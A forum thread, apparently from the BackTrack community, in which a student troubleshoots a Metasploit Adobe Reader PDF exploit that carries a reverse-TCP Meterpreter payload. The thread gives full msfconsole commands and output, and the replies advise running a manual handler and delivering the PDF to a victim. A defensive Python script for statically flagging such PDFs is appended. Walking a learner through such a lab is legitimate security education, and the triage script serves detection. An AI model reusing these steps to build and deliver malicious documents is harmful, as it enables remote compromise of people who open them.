
Thread: Issues with Client Side Attack: PDF exploit

  1. #1
    Just burned his ISO

    Issues with Client Side Attack: PDF exploit

    Hello! I'm obviously very new to the backtrack forums, well posting here that is, and I've been using the resources here for about a week already to do a project for my security class. I was doing pretty well until I just hit a wall for like 2 days straight trying to figure out how the PDF fileformat exploit with reverse_tcp payload works. I've been following the Metasploit Unleashed course, which is a great resource, but the problem is I just can't get what they're putting in the examples to actually work.

    I have also researched different sources online, but still found no definite answer.

    Here's what I've been doing:

    Code:
    msf > use exploit/windows/fileformat/adobe_utilprintf
    msf exploit(adobe_utilprintf) > set FILENAME
    FILENAME => support again.pdfdsada
    msf exploit(adobe_utilprintf) > set FILENAME support.pdf
    FILENAME => support.pdf
    msf exploit(adobe_utilprintf) > show options
    
    Module options:
    
       Name        Current Setting                      Required  Description
       ----        ---------------                      --------  -----------
       FILENAME    support.pdf                          yes       The file name.
       OUTPUTPATH  /opt/metasploit3/msf3/data/exploits  yes       The location of the file.
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Adobe Reader v8.1.2 (Windows XP SP3 English)
    
    
    msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(adobe_utilprintf) > set LHOST 192.168.1.19
    LHOST => 192.168.1.19
    msf exploit(adobe_utilprintf) > show options
    
    Module options:
    
       Name        Current Setting                      Required  Description
       ----        ---------------                      --------  -----------
       FILENAME    support.pdf                          yes       The file name.
       OUTPUTPATH  /opt/metasploit3/msf3/data/exploits  yes       The location of the file.
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique: seh, thread, none, process
       LHOST     192.168.1.19     yes       The listen address
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Adobe Reader v8.1.2 (Windows XP SP3 English)
    
    
    msf exploit(adobe_utilprintf) > exploit
    [*] Creating 'support.pdf' file...
    [*] Generated output file /opt/metasploit3/msf3/data/exploits/support.pdf
    [*] Exploit completed, but no session was created.
    Now when I took a second look the only difference I saw in the code was when the exploit activated it did not set up the handler correctly. In the example it fully stated this:

    Code:
    msf exploit(adobe_utilprintf) > exploit
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Creating 'BestComputers-UpgradeInstructions.pdf' file...
    [*] Generated output file /pentest/exploits/framework3/data/exploits/BestComputers-UpgradeInstructions.pdf
    [*] Exploit completed, but no session was created.
    Again I'm just stumped on this whole problem. It might be a simple fix that I am overlooking, and if it is I apologize for posting, but I really would like to know what I'm doing wrong. Also I've been trying to do this between two different computers on the same network but still when I activate the PDF file (even using Adobe Reader 8) it will not try to connect to the listening host.

    Again I would really appreciate it if someone could guide me through this problem, and I thank everyone in advance who responds.

  2. #2
    Super Moderator lupin

    Re: Issues with Client Side Attack: PDF exploit

    Metasploit may not be starting the Meterpreter handler - in my experience it often does not do this for fileformat style exploits. Use the jobs command to check if the handler is started or not.

    If the handler is not started, just start it manually - use the "multi/handler" module and set the payload + options in the same way as you did above. Then when you transfer the PDF you generated (/opt/metasploit3/msf3/data/exploits/support.pdf) to your victim system and open it, the reverse Meterpreter shell should connect back to your configured handler.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Just burned his ISO

    Re: Issues with Client Side Attack: PDF exploit

    Quote: Originally Posted by lupin
    Metasploit may not be starting the Meterpreter handler - in my experience it often does not do this for fileformat style exploits. Use the jobs command to check if the handler is started or not.

    If the handler is not started, just start it manually - use the "multi/handler" module and set the payload + options in the same way as you did above. Then when you transfer the PDF you generated (/opt/metasploit3/msf3/data/exploits/support.pdf) to your victim system and open it, the reverse Meterpreter shell should connect back to your configured handler.
    Thank you for the response, Lupin. I forgot to mention that I did set up the handler manually with the LHOST and LPORT the same way it was set in the PDF. But when I ran it on the system it didn't connect back at all. This is where the real situation is.

    Again when I create the actual pdf file using the utilprintf exploit the handler does not bind with the LHOST nor does it set up the reverse handler, unlike every tutorial and video has shown me. Could there be perhaps another reason why this could happen? Thanks in advance for answers!

  4. #4
    Super Moderator lupin

    Re: Issues with Client Side Attack: PDF exploit

    Is your target system's version of Acrobat Reader vulnerable to that exploit? Try with a Windows exec payload that runs calc.exe if you're not sure.
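
From the defender's side, a file like the one generated in this thread can be triaged statically before anyone opens it. The sketch below is an added example, not part of the original posts or of Metasploit; the names triage, is_suspicious and make_sample are hypothetical, and the sample input is a constructed, harmless PDF fragment.

```python
import re
import zlib

# Tokens worth reporting. util.printf is the JavaScript call the module in
# this thread is named after (assumption: the generated file calls it).
MARKERS = (b"/OpenAction", b"/JavaScript", b"/JS", b"util.printf")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)


def inflate_streams(pdf: bytes):
    """Yield the decoded body of every stream object zlib can inflate."""
    for match in STREAM_RE.finditer(pdf):
        try:
            # decompressobj tolerates the EOL bytes left before 'endstream'
            yield zlib.decompressobj().decompress(match.group(1))
        except zlib.error:
            continue  # not FlateDecode; its raw bytes are still scanned


def triage(pdf: bytes) -> dict:
    """Count each marker in the raw file plus all inflated stream bodies."""
    haystacks = [pdf, *inflate_streams(pdf)]
    return {m.decode(): sum(h.count(m) for h in haystacks) for m in MARKERS}


def is_suspicious(pdf: bytes) -> bool:
    """Flag files that both auto-run an action and carry JavaScript."""
    hits = triage(pdf)
    return bool(hits["/OpenAction"] and (hits["/JavaScript"] or hits["/JS"]))


def make_sample(script: bytes) -> bytes:
    """Constructed, harmless PDF fragment: an open action running `script`."""
    body = zlib.compress(script)
    head = (b"%PDF-1.4\n"
            b"1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n"
            b"2 0 obj\n<< /S /JavaScript /JS 3 0 R >>\nendobj\n"
            b"3 0 obj\n<< /Filter /FlateDecode /Length ")
    return (head + str(len(body)).encode() + b" >>\nstream\n"
            + body + b"\nendstream\nendobj\n%%EOF\n")


CLEAN = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n%%EOF\n"

if __name__ == "__main__":
    flagged = make_sample(b'util.printf("%d", 1);\n' * 3)
    print(triage(flagged), is_suspicious(flagged))
    print(triage(CLEAN), is_suspicious(CLEAN))
```

PDF names can be written with #xx hex escapes and streams can use filters other than FlateDecode, so a clean result here is a triage signal, not proof that a file is safe.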
